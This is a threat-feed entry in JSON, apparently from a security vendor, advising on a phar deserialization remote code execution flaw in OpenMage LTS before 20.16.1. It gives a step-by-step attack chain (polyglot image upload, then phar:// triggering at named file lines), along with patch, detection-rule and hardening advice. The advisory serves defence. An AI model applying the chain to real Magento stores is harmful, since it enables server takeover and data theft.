{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/phar-deserialization/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phar deserialization","remote code execution","OpenMage LTS","Magento 1.x"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenMage LTS versions prior to 20.16.1 are vulnerable to remote code execution due to insecure handling of PHP archives (phar) and the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper. The vulnerability stems from the usage of functions like \u003ccode\u003egetimagesize()\u003c/code\u003e, \u003ccode\u003efile_exists()\u003c/code\u003e, and \u003ccode\u003eis_readable()\u003c/code\u003e with potentially controllable file paths in image validation and media handling. An attacker can exploit this by uploading a specially crafted polyglot file (a valid image that is also a valid phar archive) and then triggering the vulnerable functions to access it using the \u003ccode\u003ephar://\u003c/code\u003e protocol, resulting in the deserialization of malicious code. This issue affects any versions derived from Magento 1.x with the vulnerable code paths in \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e, \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e, and \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a polyglot file that is both a valid image (e.g., JPEG) and a valid PHP archive (phar).\u003c/li\u003e\n\u003cli\u003eThe malicious phar archive contains serialized PHP objects designed to execute arbitrary code when deserialized.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the polyglot file to the OpenMage LTS server through a vulnerable endpoint, such as product images, CMS media, or file import functionality.\u003c/li\u003e\n\u003cli\u003eThe application stores the uploaded file in a publicly accessible directory.\u003c/li\u003e\n\u003cli\u003eThe attacker triggers the vulnerable application logic in \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e (line 72), \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e (line 137) or \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e (line 71), causing the application to use \u003ccode\u003egetimagesize()\u003c/code\u003e or similar functions on the uploaded file with the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper.\u003c/li\u003e\n\u003cli\u003ePHP attempts to read the file using the \u003ccode\u003ephar://\u003c/code\u003e wrapper, which triggers the deserialization of the malicious metadata contained within the phar archive.\u003c/li\u003e\n\u003cli\u003eThe deserialization process instantiates the malicious PHP objects, executing the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution on the server, allowing them to compromise the system, install malware, or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to execute arbitrary code on the OpenMage LTS server. This can lead to complete system compromise, data theft, defacement of the website, or the installation of malware. Given the potential for unauthenticated file uploads, the impact is significant, with potential widespread compromise affecting all versions of OpenMage LTS prior to 20.16.1. The vulnerability exists in core Magento 1.x code, so all derived products are affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade OpenMage LTS to version 20.16.1 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003eImplement the recommended code fix by blocking \u003ccode\u003ephar://\u003c/code\u003e paths before passing to vulnerable functions like \u003ccode\u003egetimagesize()\u003c/code\u003e in the affected files: \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e, \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e, and \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect attempts to access files using the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper (see rule \u0026ldquo;Detect Phar Stream Wrapper Access\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eIf upgrading is not immediately possible, disable the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper in the \u003ccode\u003ephp.ini\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eImplement strict upload validation beyond file extension checks to prevent the upload of polyglot files.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T14:32:48Z","date_published":"2026-04-21T14:32:48Z","id":"/briefs/2024-01-openmage-phar-deserialization/","summary":"A remote code execution vulnerability exists in OpenMage LTS versions prior to 20.16.1 due to Phar deserialization, where an attacker can upload a malicious phar file disguised as an image and trigger deserialization via functions like `getimagesize()`, `file_exists()`, or `is_readable()` when processing `phar://` stream wrapper paths, leading to arbitrary code execution.","title":"OpenMage LTS Phar Deserialization RCE","url":"https://feed.craftedsignal.io/briefs/2024-01-openmage-phar-deserialization/"}],"language":"en","title":"CraftedSignal Threat Feed — Phar Deserialization","version":"https://jsonfeed.org/version/1.1"}